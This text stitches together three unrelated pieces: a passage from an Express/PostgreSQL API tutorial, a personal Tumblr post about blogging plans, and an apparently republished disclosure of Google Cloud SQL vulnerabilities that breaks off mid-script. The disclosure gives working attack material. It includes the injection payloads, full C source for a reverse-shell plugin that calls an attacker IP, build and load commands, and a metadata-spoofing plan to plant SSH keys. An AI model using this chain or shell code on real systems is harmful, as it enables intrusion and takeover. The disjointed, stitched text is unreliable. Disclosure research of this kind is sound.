This way we don’t have to initialize everything inside each of our test files. So we import the necessary packages and export what we initialized — which we can then import in the files that need them. Open up index.test.js and paste the following test code. import { expect, server, BASE_URL } from './setup'; describe('Index page test', () => { it('gets base url', done => { server .get(`${BASE_URL}/`) .expect(200) .end((err, res) => { expect(res.status).to.equal(200); expect(res.body.message).to.equal( 'Environment variable is coming across.' ); done(); }); }); }); Here we make a request to get the base endpoint, which is / and assert that the res.body object has a message key with a value of Environment variable is coming across. If you’re not familiar with the describe, it pattern, I encourage you to take a quick look at Mocha’s “Getting Started” doc. Add the test command to the scripts section of package.json. "test": "nyc --reporter=html --reporter=text --reporter=lcov mocha -r @babel/register" This script executes our test with nyc and generates three kinds of coverage report: an HTML report, outputted to the coverage/ folder; a text report outputted to the terminal and an lcov report outputted to the .nyc_output/ folder. Now run yarn test. You should see a text report in your terminal just like the one in the below photo. Test coverage report (Large preview) Notice that two additional folders are generated: .nyc_output/ coverage/ Look inside .gitignore and you’ll see that we’re already ignoring both. I encourage you to open up coverage/index.html in a browser and view the test report for each file. This is a good point to commit your changes. The corresponding branch in my repo is 04-first-test. Continuous Integration(CD) And Badges: Travis, Coveralls, Code Climate, AppVeyor It’s now time to configure continuous integration and deployment (CI/CD) tools. We will configure common services such as travis-ci, coveralls, AppVeyor, and codeclimate and add badges to our README file. Let’s get started. Travis CI Travis CI is a tool that runs our tests automatically each time we push a commit to GitHub (and recently, Bitbucket) and each time we create a pull request. This is mostly useful when making pull requests by showing us if the our new code has broken any of our tests. Visit travis-ci.com or travis-ci.org and create an account if you don’t have one. You have to sign up with your GitHub account. Hover over the dropdown arrow next to your profile picture and click on settings. Under Repositories tab click Manage repositories on Github to be redirected to Github. On the GitHub page, scroll down to Repository access and click the checkbox next to Only select repositories. Click the Select repositories dropdown and find the express-api-template repo. Click it to add it to the list of repositories you want to add to travis-ci. Click Approve and install and wait to be redirected back to travis-ci. At the top of the repo page, close to the repo name, click on the build unknown icon. From the Status Image modal, select markdown from the format dropdown. Copy the resulting code and paste it in your README.md file. On the project page, click on More options > Settings. Under Environment Variables section, add the TEST_ENV_VARIABLE env variable. When entering its value, be sure to have it within double quotes like this "Environment variable is coming across." 
Create a .travis.yml file at the root of your project and paste in the below code (we'll set the value of CC_TEST_REPORTER_ID in the Code Climate section).

language: node_js
env:
  global:
    - CC_TEST_REPORTER_ID=get-this-from-code-climate-repo-page
matrix:
  include:
    - node_js: '12'
cache:
  directories: [node_modules]
install: yarn
after_success: yarn coverage
before_script:
  - curl -L https://codeclimate.com/downloads/test-reporter/test-reporter-latest-linux-amd64 > ./cc-test-reporter
  - chmod +x ./cc-test-reporter
  - ./cc-test-reporter before-build
script:
  - yarn test
after_script:
  - ./cc-test-reporter after-build --exit-code $TRAVIS_TEST_RESULT

First, we tell Travis to run our test with Node.js, then set the CC_TEST_REPORTER_ID global environment variable (we'll get to this in the Code Climate section). In the matrix section, we tell Travis to run our tests with Node.js v12. We also want to cache the node_modules/ directory so it doesn't have to be regenerated every time.

We install our dependencies using the yarn command, which is a shorthand for yarn install. The before_script and after_script commands are used to upload coverage results to Code Climate. We'll configure Code Climate shortly. After yarn test runs successfully, we want to also run yarn coverage, which will upload our coverage report to coveralls.io.

Coveralls

Coveralls uploads test coverage data for easy visualization. We can view the test coverage on our local machine from the coverage folder, but Coveralls makes it available outside our local machine.

Visit coveralls.io and either sign in or sign up with your GitHub account. Hover over the left-hand side of the screen to reveal the navigation menu. Click on ADD REPOS. Search for the express-api-template repo and turn on coverage using the toggle button on the left-hand side. If you can't find it, click on SYNC REPOS on the upper right-hand corner and try again. Note that your repo has to be public, unless you have a PRO account.

Click details to go to the repo details page. Create the .coveralls.yml file at the root of your project and enter the below code. To get the repo_token, click on the repo details. You will find it easily on that page. You could just do a browser search for repo_token.

repo_token: get-this-from-repo-settings-on-coveralls.io

This token maps your coverage data to a repo on Coveralls. Now, add the coverage command to the scripts section of your package.json file:

"coverage": "nyc report --reporter=text-lcov | coveralls"

This command uploads the coverage report in the .nyc_output folder to coveralls.io. Turn on your Internet connection and run:

yarn coverage

This should upload the existing coverage report to coveralls. Refresh the repo page on coveralls to see the full report.

On the details page, scroll down to find the BADGE YOUR REPO section. Click on the EMBED dropdown and copy the markdown code and paste it into your README file.

Code Climate

Code Climate is a tool that helps us measure code quality. It shows us maintenance metrics by checking our code against some defined patterns. It detects things such as unnecessary repetition and deeply nested for loops. It also collects test coverage data just like coveralls.io.

Visit codeclimate.com and click on 'Sign up with GitHub'. Log in if you already have an account. Once in your dashboard, click on Add a repository. Find the express-api-template repo from the list and click on Add Repo. Wait for the build to complete and redirect to the repo dashboard. Under Codebase Summary, click on Test Coverage.
Under the Test coverage menu, copy the TEST REPORTER ID and paste it in your .travis.yml as the value of CC_TEST_REPORTER_ID. Still on the same page, on the left-hand navigation, under EXTRAS, click on Badges. Copy the maintainability and test coverage badges in markdown format and paste them into your README.md file. It’s important to note that there are two ways of configuring maintainability checks. There are the default settings that are applied to every repo, but if you like, you could provide a .codeclimate.yml file at the root of your project. I’ll be using the default settings, which you can find under the Maintainability tab of the repo settings page. I encourage you to take a look at least. If you still want to configure your own settings, this guide will give you all the information you need. AppVeyor AppVeyor and Travis CI are both automated test runners. The main difference is that travis-ci runs tests in a Linux environment while AppVeyor runs tests in a Windows environment. This section is included to show how to get started with AppVeyor. Visit AppVeyor and log in or sign up. On the next page, click on NEW PROJECT. From the repo list, find the express-api-template repo. Hover over it and click ADD. Click on the Settings tab. Click on Environment on the left navigation. Add TEST_ENV_VARIABLE and its value. Click ‘Save’ at the bottom of the page. Create the appveyor.yml file at the root of your project and paste in the below code. environment: matrix: - nodejs_version: "12" install: - yarn test_script: - yarn test build: off This code instructs AppVeyor to run our tests using Node.js v12. We then install our project dependencies with the yarn command. test_script specifies the command to run our test. The last line tells AppVeyor not to create a build folder. Click on the Settings tab. On the left-hand navigation, click on badges. Copy the markdown code and paste it in your README.md file. Commit your code and push to GitHub. If you have done everything as instructed all tests should pass and you should see your shiny new badges as shown below. Check again that you have set the environment variables on Travis and AppVeyor. Repo CI/CD badges. (Large preview) Now is a good time to commit our changes. The corresponding branch in my repo is 05-ci. Adding A Controller Currently, we’re handling the GET request to the root URL, /v1, inside the src/routes/index.js. This works as expected and there is nothing wrong with it. However, as your application grows, you want to keep things tidy. You want concerns to be separated — you want a clear separation between the code that handles the request and the code that generates the response that will be sent back to the client. To achieve this, we write controllers. Controllers are simply functions that handle requests coming through a particular URL. To get started, create a controllers/ folder inside the src/ folder. Inside controllers create two files: index.js and home.js. We would export our functions from within index.js. You could name home.js anything you want, but typically you want to name controllers after what they control. For example, you might have a file usersController.js to hold every function related to users in your app. Open src/controllers/home.js and enter the code below: import { testEnvironmentVariable } from '../settings'; export const indexPage = (req, res) => res.status(200).json({ message: testEnvironmentVariable }); You will notice that we only moved the function that handles the request for the / route. 
Open src/controllers/index.js and enter the below code. // export everything from home.js export * from './home'; We export everything from the home.js file. This allows us shorten our import statements to import { indexPage } from '../controllers'; Open src/routes/index.js and replace the code there with the one below: import express from 'express'; import { indexPage } from '../controllers'; const indexRouter = express.Router(); indexRouter.get('/', indexPage); export default indexRouter; The only change here is that we’ve provided a function to handle the request to the / route. You just successfully wrote your first controller. From here it’s a matter of adding more files and functions as needed. Go ahead and play with the app by adding a few more routes and controllers. You could add a route and a controller for the about page. Remember to update your test, though. Run yarn test to confirm that we’ve not broken anything. Does your test pass? That’s cool. This is a good point to commit our changes. The corresponding branch in my repo is 06-controllers. Connecting The PostgreSQL Database And Writing A Model Our controller currently returns hard-coded text messages. In a real-world app, we often need to store and retrieve information from a database. In this section, we will connect our app to a PostgreSQL database. We’re going to implement the storage and retrieval of simple text messages using a database. We have two options for setting a database: we could provision one from a cloud server, or we could set up our own locally. I would recommend you provision a database from a cloud server. ElephantSQL has a free plan that gives 20MB of free storage which is sufficient for this tutorial. Visit the site and click on Get a managed database today. Create an account (if you don’t have one) and follow the instructions to create a free plan. Take note of the URL on the database details page. We’ll be needing it soon. ElephantSQL turtle plan details page (Large preview) If you would rather set up a database locally, you should visit the PostgreSQL and PgAdmin sites for further instructions. Once we have a database set up, we need to find a way to allow our Express app to communicate with our database. Node.js by default doesn’t support reading and writing to PostgreSQL database, so we’ll be using an excellent library, appropriately named, node-postgres. node-postgres executes SQL queries in node and returns the result as an object, from which we can grab items from the rows key. Let’s connect node-postgres to our application. # install node-postgres yarn add pg Open settings.js and add the line below: export const connectionString = process.env.CONNECTION_STRING; Open your .env file and add the CONNECTION_STRING variable. This is the connection string we’ll be using to establish a connection to our database. The general form of the connection string is shown below. CONNECTION_STRING="postgresql://dbuser:dbpassword@localhost:5432/dbname" If you’re using elephantSQL you should copy the URL from the database details page. Inside your /src folder, create a new folder called models/. 
Inside this folder, create two files:

pool.js
model.js

Open pool.js and paste the following code:

import { Pool } from 'pg';
import dotenv from 'dotenv';
import { connectionString } from '../settings';

dotenv.config();

export const pool = new Pool({ connectionString });

First, we import Pool and dotenv from the pg and dotenv packages, and then import the settings we created for our postgres database before initializing dotenv. We establish a connection to our database with the Pool object. In node-postgres, every query is executed by a client. A Pool is a collection of clients for communicating with the database.

To create the connection, the pool constructor takes a config object. You can read more about all the possible configurations here. It also accepts a single connection string, which I will use here.

Open model.js and paste the following code:

import { pool } from './pool';

class Model {
  constructor(table) {
    this.pool = pool;
    this.table = table;
    this.pool.on('error', (err, client) => `Error, ${err}, on idle client${client}`);
  }

  async select(columns, clause) {
    let query = `SELECT ${columns} FROM ${this.table}`;
    if (clause) query += clause;
    return this.pool.query(query);
  }
}

export default Model;

We create a model class whose constructor accepts the database table we wish to operate on. We'll be using a single pool for all our models.

We then create a select method which we will use to retrieve items from our database. This method accepts the columns we want to retrieve and a clause, such as a WHERE clause. It returns the result of the query, which is a Promise. Remember we said earlier that every query is executed by a client, but here we execute the query with pool. This is because, when we use pool.query, node-postgres executes the query using the first available idle client.

The query you write is entirely up to you, provided it is a valid SQL statement that can be executed by a Postgres engine.

The next step is to actually create an API endpoint to utilize our newly connected database. Before we do that, I'd like us to create some utility functions. The goal is for us to have a way to perform common database operations from the command line.

Create a folder, utils/, inside the src/ folder. Create three files inside this folder:

queries.js
queryFunctions.js
runQuery.js

We're going to create functions to create a table in our database, insert seed data into the table, and delete the table.

Open up queries.js and paste the following code:

export const createMessageTable = `
  DROP TABLE IF EXISTS messages;
  CREATE TABLE IF NOT EXISTS messages (
    id SERIAL PRIMARY KEY,
    name VARCHAR DEFAULT '',
    message VARCHAR NOT NULL
  )
`;

export const insertMessages = `
  INSERT INTO messages(name, message)
  VALUES ('chidimo', 'first message'),
         ('orji', 'second message')
`;

export const dropMessagesTable = 'DROP TABLE messages';

In this file, we define three SQL query strings. The first query deletes and recreates the messages table. The second query inserts two rows into the messages table. Feel free to add more items here. The last query drops/deletes the messages table.
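As an aside (this is not part of the original tutorial), the Model class above only reads from the database. A natural extension is an insert method built in the same style; the sketch below is one way it could look, using a parameterized query so that node-postgres escapes the values instead of having them interpolated into the SQL string. The method name insertWithReturn and its arguments are my own choices.

import { pool } from './pool';

class Model {
  constructor(table) {
    this.pool = pool;
    this.table = table;
    this.pool.on('error', (err, client) => `Error, ${err}, on idle client${client}`);
  }

  async select(columns, clause) {
    let query = `SELECT ${columns} FROM ${this.table}`;
    if (clause) query += clause;
    return this.pool.query(query);
  }

  // Hypothetical addition: insert a row and return it.
  // `columns` is a string such as 'name, message'; `values` is an array such as ['chidimo', 'hello'].
  async insertWithReturn(columns, values) {
    // Build $1, $2, ... placeholders so values are passed separately from the SQL text.
    const placeholders = values.map((_, index) => `$${index + 1}`).join(', ');
    const query = `
      INSERT INTO ${this.table}(${columns})
      VALUES (${placeholders})
      RETURNING *
    `;
    // pool.query(text, values) runs a parameterized query and returns a Promise.
    return this.pool.query(query, values);
  }
}

export default Model;

A controller could then create rows as well as read them; a sketch of that follows a little later, after the messages controller below.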
Open queryFunctions.js and paste the following code:

import { pool } from '../models/pool';
import {
  insertMessages,
  dropMessagesTable,
  createMessageTable,
} from './queries';

export const executeQueryArray = async arr => new Promise(resolve => {
  const stop = arr.length;
  arr.forEach(async (q, index) => {
    await pool.query(q);
    if (index + 1 === stop) resolve();
  });
});

export const dropTables = () => executeQueryArray([ dropMessagesTable ]);
export const createTables = () => executeQueryArray([ createMessageTable ]);
export const insertIntoTables = () => executeQueryArray([ insertMessages ]);

Here, we create functions to execute the queries we defined earlier. Note that the executeQueryArray function executes an array of queries and waits for each one to complete inside the loop. (Don't do such a thing in production code though.) Then, we only resolve the promise once we have executed the last query in the list. The reason for using an array is that the number of such queries will grow as the number of tables in our database grows.

Open runQuery.js and paste the following code:

import { createTables, insertIntoTables } from './queryFunctions';

(async () => {
  await createTables();
  await insertIntoTables();
})();

This is where we execute the functions to create the table and insert the messages into the table. Let's add a command in the scripts section of our package.json to execute this file.

"runQuery": "babel-node ./src/utils/runQuery"

Now run:

yarn runQuery

If you inspect your database, you will see that the messages table has been created and that the messages were inserted into the table.

If you're using ElephantSQL, on the database details page, click on BROWSER from the left navigation menu. Select the messages table and click Execute. You should see the messages from the queries.js file.

Let's create a controller and route to display the messages from our database.

Create a new controller file src/controllers/messages.js and paste the following code:

import Model from '../models/model';

const messagesModel = new Model('messages');

export const messagesPage = async (req, res) => {
  try {
    const data = await messagesModel.select('name, message');
    res.status(200).json({ messages: data.rows });
  } catch (err) {
    res.status(200).json({ messages: err.stack });
  }
};

We import our Model class and create a new instance of that model. This represents the messages table in our database. We then use the select method of the model to query our database. The data (name and message) we get is sent as JSON in the response.

We define the messagesPage controller as an async function. Since node-postgres queries return a promise, we await the result of that query. If we encounter an error during the query, we catch it and display the stack to the user. You should decide how you choose to handle the error.

Add the get messages endpoint to src/routes/index.js and update the import line.

# update the import line
import { indexPage, messagesPage } from '../controllers';

# add the get messages endpoint
indexRouter.get('/messages', messagesPage)

Visit http://localhost:3000/v1/messages and you should see the messages displayed as shown below.

Messages from database. (Large preview)

Now, let's update our test file. When doing TDD, you usually write your tests before implementing the code that makes the test pass. I'm taking the opposite approach here because we're still working on setting up the database.
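Before moving on to the tests, here is a sketch (again, not part of the original tutorial) of how the insertWithReturn method suggested earlier could be exposed over HTTP. The controller name addMessage and the POST route are my own choices.

// Hypothetical addition to src/controllers/messages.js (illustration only).
// Model and messagesModel are already defined in that file, as shown above:
// import Model from '../models/model';
// const messagesModel = new Model('messages');

export const addMessage = async (req, res) => {
  // express.json() is already applied in app.js, so req.body holds the parsed JSON payload.
  const { name, message } = req.body;
  try {
    // insertWithReturn is the hypothetical method sketched in the model section above.
    const data = await messagesModel.insertWithReturn('name, message', [name, message]);
    res.status(201).json({ messages: data.rows });
  } catch (err) {
    res.status(500).json({ messages: err.stack });
  }
};

// And in src/routes/index.js:
// indexRouter.post('/messages', addMessage);

With that aside out of the way, back to the tests.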
Create a new file, hooks.js, in the test/ folder and enter the below code:

import {
  dropTables,
  createTables,
  insertIntoTables,
} from '../src/utils/queryFunctions';

before(async () => {
  await createTables();
  await insertIntoTables();
});

after(async () => {
  await dropTables();
});

When our test starts, Mocha finds this file and executes it before running any test file. It executes the before hook to create the tables and insert some items into them. The test files then run after that. Once the tests are finished, Mocha runs the after hook in which we drop the tables. This ensures that each time we run our tests, we do so with clean and new records in our database.

Create a new test file test/messages.test.js and add the below code:

import { expect, server, BASE_URL } from './setup';

describe('Messages', () => {
  it('get messages page', done => {
    server
      .get(`${BASE_URL}/messages`)
      .expect(200)
      .end((err, res) => {
        expect(res.status).to.equal(200);
        expect(res.body.messages).to.be.instanceOf(Array);
        res.body.messages.forEach(m => {
          expect(m).to.have.property('name');
          expect(m).to.have.property('message');
        });
        done();
      });
  });
});

We assert that the result of the call to the /messages endpoint is an array of messages, and that each message in the array has a name and a message property.
Source: Agilenano - News, https://agilenano.com/blogs/news/how-to-set-up-an-express-api-backend-project-with-postgresql-chidi-orji-2020-04-08t11-00-00-00-002020-04-08t13-35-17-00-00
logothanatos · 8 years ago
Text
Update on Blogging Plans
Uncertainty regarding servers
Due to the amount of time it would take to make a blog from scratch on my own, I have decided to use Tumblr as a temporary holding place for my posts. Sure, it doesn't have export features like WordPress does, but it seems to be the most convenient for both customization and de-cluttering. WordPress was also having an issue for me where it presented the user interface in two completely different designs, and links to the WordPress dashboard would seem to link to either of the design versions. This led to a jarring user experience and was a distraction from publishing posts.

I think the original plan of building a web blog from scratch will have to be postponed indefinitely, since I need to plan dedicated hardware beyond a mere Raspberry Pi, or at least would have to plan for contingencies if I'm to self-host. Alternatively, I could do the standard thing and pay for server space, though I'm not a huge fan of that. I want my data at home as much as possible while still sharing with or web-"serving" others.

It seems to me this decision goes hand in hand with software decisions, in terms of what database server software or web server software I'd want to use. In fact, with the nascent development of decentralized blockchain projects, this decision is bound to compel hesitation on my part. For example, I could use the IPFS network as a CDN for my website, or host my website on IPFS using something like Hugo/Pelican, which can give me some of the perks of a dynamic website without legitimately having to be one (so to speak). On the other hand, I could wait for these to mature. In that case, if I self-host nonetheless, I believe I'm stuck with the following: PostgreSQL vs. RethinkDB/BigchainDB, with Nginx/Node.js.

That would require, though, some flexibility in my capacity to purchase new hardware, since I do want something more powerful than merely a Raspberry Pi. Something else I've considered is having my computer run a terminal server session as opposed to a desktop session, never turning it off. The problem is probably that I have no stable source of income, and so no baseline for the monetary side of a cost-benefit assessment. This is especially the case when considering data redundancy and long-term server load handling.
Regarding idleness on current Tumblr blog
I may in fact be idle on this blog for some time, and even once I cease being idle, the blog's CSS styling and HTML structure may still lack a sufficient degree of integrity while I use it. So far I've been spending a good amount of time on creating a custom HTML/CSS theme, since I wasn't satisfied with the free themes (and apparently there are fewer free Tumblr themes than there used to be--quite the travesty). I was also going to incorporate some JavaScript, but to save time from trying to figure out why otherwise perfectly valid JS doesn't seem to work, I've decided to jettison the use of JS (for now) in favor of standard hard-coded HTML. That's not to say I don't plan to replace this with JS over time in a piecemeal fashion.
Notes on Custom Tumblr Theme
So far, I’ll make a note here of the next few tasks I still have forthcoming for the Tumblr theme.
[image: screenshot of the theme code]
So far I’ve only defined properties for the textid class (which is to say, only added the identifier color of the little top-right box of a given post to the text post-type). I will need to define such properties for other [post-type]id classes (which is to say, will have to add the identifier color box to other post-types).
[image: screenshot of the theme code]
Here, on the other hand, I will need to further define li classes under the ol postlist class tag by inserting “{TagsasClasses}.” For the “{block:[post-type]}” sections under the “{block:Posts}” section, it may also be useful to specify share buttons for external services (e.g., Facebook, Kitsu) in the postop class p tag, though this task may be focused on later. Before moving to such a task it is best to at least figure out the issue of the Like and Reblog buttons floating to the left, as opposed to floating to the right as the postop class p tag was styled to do; to figure out why the portrait/avatar image in the postbottom class p tag is not near the right edge of the postitem class li tag, despite postitem being styled to float right; and finally, to specify background images via CSS for certain tags, potentially defining one of the id attributes in the “{block:TagPage}” section of the markup code.
1 note · View note
itbeatsbookmarks · 5 years ago
Link
(Via: Hacker News)
Note: The vulnerabilities that are discussed in this post were patched quickly and properly by Google. We support responsible disclosure. The research that resulted in this post was done by me and my bug-hunting friend Ezequiel Pereira. You can read this same post on his website.
About Cloud SQL
Google Cloud SQL is a fully managed relational database service. Customers can deploy an SQL Server, PostgreSQL or MySQL instance which is secured, monitored and updated by Google. More demanding users can easily scale, replicate or configure high availability. By doing so, users can focus on working with the database instead of dealing with all the previously mentioned complex tasks. Cloud SQL databases are accessible by using the applicable command line utilities or from any application hosted around the world. This write-up covers vulnerabilities that we discovered in the MySQL 5.6 and 5.7 versions of Cloud SQL.
Limitations of a managed MySQL instance
Because Cloud SQL is a fully managed service, users don’t have access to certain features, in particular the SUPER and FILE privileges. In MySQL, the SUPER privilege is reserved for system administration tasks and the FILE privilege for reading from and writing to files on the server running the MySQL daemon. Any attacker who gets hold of these privileges can easily compromise the server.
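A quick way to see which privileges the connecting user actually has is to ask MySQL directly. This is a minimal check, assuming you can already connect as 'root'@'%'; the instance address is a placeholder:

mysql -h <instance-ip> -u root -p -e "SHOW GRANTS FOR CURRENT_USER();"
# On a managed Cloud SQL instance, SUPER and FILE should be absent from the grant list.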
Furthermore, mysqld port 3306 is not reachable from the public internet by default due to firewalling. When a user connects to MySQL using the gcloud client ('gcloud sql connect <instance>'), the user's IP address is temporarily added to the whitelist of hosts that are allowed to connect.
Users do get access to the ‘root’@’%’ account. In MySQL users are defined by a username AND hostname. In this case the user ‘root’ can connect from any host (‘%’). 
Elevating privileges
Bug 1. Obtaining FILE privileges through SQL injection
When looking at the web-interface of the MySQL instance in the Google Cloud console, we notice several features are presented to us. We can create a new database, new users and we can import and export databases from and to storage buckets. While looking at the export feature, we noticed we can enter a custom query when doing an export to a CSV file. 
Because we want to know how Cloud SQL is doing the CSV export, we intentionally enter the incorrect query “SELECT * FROM evil AND A TYPO HERE”. This query results in the following error: 
Error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND A TYPO HERE INTO OUTFILE '/mysql/tmp/savedata-1589274544663130747.csv' CHARA' at line 1
The error clearly shows that the user that is connecting to mysql to do the export has FILE privileges. It attempts to select data to temporarily store it into the ‘/mysql/tmp’ directory before exporting it to a storage bucket. When we run ‘SHOW VARIABLES’ from our mysql client we notice that ‘/mysql/tmp’ is the secure_file_priv directory, meaning that ‘/mysql/tmp’ is the only path where a user with FILE privileges is allowed to store files. 
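The same check is easy to reproduce from any MySQL client; the variable to look at is secure_file_priv (the instance address below is a placeholder):

mysql -h <instance-ip> -u root -p -e "SHOW VARIABLES LIKE 'secure_file_priv';"
# On the Cloud SQL MySQL 5.6/5.7 instances described here, this returns /mysql/tmp.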
By adding the MySQL comment character (#) to the query we can perform SQL injection with FILE privileges: 
SELECT * FROM ourdatabase INTO OUTFILE '/mysql/tmp/evilfile' #
An attacker could now craft a malicious database and select the contents of a table but can only write the output to a file under ‘/mysql/tmp’. This does not sound very promising so far. 
Bug 2. Parameter injection in mysqldump
When doing a regular export of a database we notice that the end result is a .sql file which is dumped by the 'mysqldump' tool. This can easily be confirmed by opening an exported database from a storage bucket; the first lines of the dump reveal the tool and version:
-- MySQL dump 10.13  Distrib 5.7.25, for Linux (x86_64)
--
-- Host: localhost    Database: mysql
-- ------------------------------------------------------
-- Server version       5.7.25-google-log
Now we know that when we run the export tool, the Cloud SQL API somehow invokes mysqldump and stores the database before moving it to a storage bucket. 
When we intercept the API call that is responsible for the export with Burp we see that the database (‘mysql’ in this case) is passed as a parameter: 
An attempt to modify the database name in the API call from 'mysql' into '--help' results in something that surprised us. The mysqldump help is dumped into a .sql file in a storage bucket.
mysqldump  Ver 10.13 Distrib 5.7.25, for Linux (x86_64)
Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved.
…
Dumping structure and contents of MySQL databases and tables.
Usage: mysqldump [OPTIONS] database [tables]
OR     mysqldump [OPTIONS] --databases [OPTIONS] DB1 [DB2 DB3...]
OR     mysqldump [OPTIONS] --all-databases [OPTIONS]
...
  --print-defaults        Print the program argument list and exit.
  --no-defaults           Don't read default options from any option file,
                          except for login file.
  --defaults-file=#       Only read default options from the given file #.
Testing for command injection resulted in failure, however. It seems like mysqldump is passed as the first argument to execve(), rendering a command injection attack impossible.
We can, however, pass arbitrary parameters to mysqldump, as the '--help' command illustrates.
Crafting a malicious database
Among a lot of, in this case useless, parameters that mysqldump has to offer, two stand out from the rest, namely '--plugin-dir' and '--default-auth'.
The --plugin-dir parameter allows us to pass the directory where client-side plugins are stored. The --default-auth parameter specifies which authentication plugin we want to use. Remember that we could write to '/mysql/tmp'? What if we write a malicious plugin to '/mysql/tmp' and load it with the aforementioned mysqldump parameters? We must however prepare the attack locally. We need a malicious database that we can import into Cloud SQL, before we can export any useful content into '/mysql/tmp'. We prepare this locally on a mysql server running on our desktop computers.
First we write a malicious shared object which spawns a reverse shell to a specified IP address. We overwrite the _init function:
#include <sys/types.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <netinet/ip.h>

/* Runs automatically when the shared object is loaded as a plugin. */
void _init() {
    int fd;
    int port = 1234;
    struct sockaddr_in addr;
    char * callback = "123.123.123.123";   /* attacker-controlled callback IP */
    char mesg[] = "Shell on speckles>\n";
    char shell[] = "/bin/sh";

    addr.sin_family = AF_INET;
    addr.sin_port = htons(port);
    addr.sin_addr.s_addr = inet_addr(callback);

    /* Connect back to the listener, greet it, and attach stdin/stdout/stderr to the socket. */
    fd = socket(AF_INET, SOCK_STREAM, 0);
    connect(fd, (struct sockaddr*)&addr, sizeof(addr));
    send(fd, mesg, sizeof(mesg), 0);
    dup2(fd, 0);
    dup2(fd, 1);
    dup2(fd, 2);
    execl(shell, "sshd", 0, NULL);
    close(fd);
}
We compile it into a shared object with the following command: 
gcc -fPIC -shared -o evil_plugin.so evil_plugin.c -nostartfiles
On our locally running database server, we now insert the evil_plugin.so file into a longblob table: 
mysql -h localhost -u root
> CREATE DATABASE files;
> USE files;
> CREATE TABLE `data` ( `exe` longblob ) ENGINE=MyISAM DEFAULT CHARSET=binary;
> INSERT INTO data VALUES(LOAD_FILE('evil_plugin.so'));
Our malicious database is now done! We export it to a .sql file with mysqldump: 
mysqldump -h localhost -u root files > files.sql
Next we store files.sql in a storage bucket. After that, we create a database called ‘files’ in Cloud SQL and import the malicious database dump into it. 
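One way to stage and import the dump with the gsutil/gcloud CLIs might look like this (a sketch; the bucket and instance names are placeholders, and the same steps can just as well be done from the Cloud Console):

gsutil cp files.sql gs://<your-bucket>/files.sql
gcloud sql databases create files --instance=<cloudsql-instance>
gcloud sql import sql <cloudsql-instance> gs://<your-bucket>/files.sql --database=files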
Dropping a Shell
With everything prepared, all that's left now is writing the evil_plugin.so to /mysql/tmp before triggering the reverse shell by injecting '--plugin-dir=/mysql/tmp/ --default-auth=evil_plugin' as parameters to mysqldump that runs server-side.
To accomplish this we once again run the CSV export feature, this time against the 'files' database, while passing the following data as its query argument:
SELECT * FROM data INTO DUMPFILE '/mysql/tmp/evil_plugin.so' #
Now we run a regular export against the mysql database again, and modify the request to the API with Burp to pass the correct parameters to mysqldump: 
Success! On our listening netcat we are now dropped into a reverse shell.
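For completeness, the listening side is just netcat bound to the port hard-coded in evil_plugin.c, run on the callback host; depending on the netcat flavor, something like:

nc -nlvp 1234      # traditional netcat / ncat
# or, with OpenBSD netcat:
nc -lnv 1234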
Fun fact
Not long after we started exploring the environment we had landed our shell in, we noticed a new file in the /mysql/tmp directory named 'greetings.txt':
Google SRE (Site Reliability Engineering) appeared to be on to us 🙂 It turned out that during our attempts we had crashed a few of our own instances, which alarmed them. We got in touch with SRE via e-mail and informed them about our little adventure, and they kindly replied back.
However, our journey did not end here, since it appeared that we were trapped inside a Docker container, running nothing more than the bare minimum needed to export our database. We needed to find a way to escape, and we needed it quickly: SRE knew what we were doing, and Google might already be working on a patch.
Escaping to the host
The container that we had access to was running unprivileged, meaning that no easy escape was available. Upon inspecting the network configuration we noticed that we had access to eth0, which in this case had the internal IP address of the container attached to it. 
This was due to the fact that the container was configured with the Docker host networking driver (--network=host). When you run a Docker container without any special privileges, its network stack is isolated from the host. When you run a container in host network mode, that's no longer the case. The container no longer gets its own IP address, but instead binds all services directly to the host's IP. Furthermore, we can intercept ALL network traffic that the host is sending and receiving on eth0 (tcpdump -i eth0).
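The difference is easy to reproduce on any machine with Docker; this is a generic illustration of the host networking driver, not the Cloud SQL setup itself:

# Default bridge networking: the container gets its own network namespace and addresses.
docker run --rm alpine ip addr
# Host networking: the container sees the host's interfaces (eth0 included) and, given the
# usual NET_RAW capability, can sniff them with tcpdump.
docker run --rm --network=host alpine ip addr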
The Google Guest Agent (/usr/bin/google_guest_agent)
When you inspect network traffic on a regular Google Compute Engine instance you will see a lot of plain HTTP requests being directed to the metadata instance on 169.254.169.254. One service that makes such requests is the Google Guest Agent. It runs by default on any GCE instance that you configure. An example of the requests it makes can be found below.
The Google Guest Agent monitors the metadata for changes. One of the properties it looks for is the SSH public keys. When a new public SSH key is found in the metadata, the guest agent writes this public key to the user's authorized_keys file, creating a new user if necessary and adding it to sudoers.
The way the Google Guest Agent monitors for changes is through a call to retrieve all metadata values recursively (GET /computeMetadata/v1/?recursive=true), indicating to the metadata server to only send a response when there is any change with respect to the last retrieved metadata values, identified by its Etag (wait_for_change=true&last_etag=<ETAG>).
This request also includes a timeout (timeout_sec=<TIME>), so if a change does not occur within the specified amount of time, the metadata server responds with the unchanged values.
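The same long-polling request can be made by hand from inside a VM, which is handy for seeing exactly what the guest agent receives. This is a sketch using the standard GCE metadata API header and the parameters described above; the etag value and timeout are placeholders:

curl -s -H "Metadata-Flavor: Google" \
  "http://169.254.169.254/computeMetadata/v1/?recursive=true&alt=json&wait_for_change=true&last_etag=<ETAG>&timeout_sec=60"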
Executing the attack
Taking into consideration the access to the host network, and the behavior of the Google Guest Agent, we decided that spoofing the Metadata server SSH keys response would be the easiest way to escape our container.
Since ARP spoofing does not work on Google Compute Engine networks, we used our own modified version of rshijack (diff) to send our spoofed response.
This modified version of rshijack allowed us to pass the ACK and SEQ numbers as command-line arguments, saving time and allowing us to spoof a response before the real Metadata response came.
We also wrote a small Shell script that would return a specially crafted payload that would trigger the Google Guest Agent to create the user “wouter”, with our own public key in its authorized_keys file.
This script receives the ETag as a parameter, since by keeping the same ETag, the Metadata server wouldn’t immediately tell the Google Guest Agent that the metadata values were different on the next response, instead waiting the specified amount of seconds in timeout_sec.
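The original script isn't included in the post, so the following is only a minimal sketch of what it plausibly looked like. The raw HTTP framing is what rshijack needs in order to inject a complete response into the TCP stream; the exact JSON layout of the metadata reply, and the key names the guest agent reads (such as an instance-level ssh-keys attribute), are assumptions on our part:

#!/bin/sh
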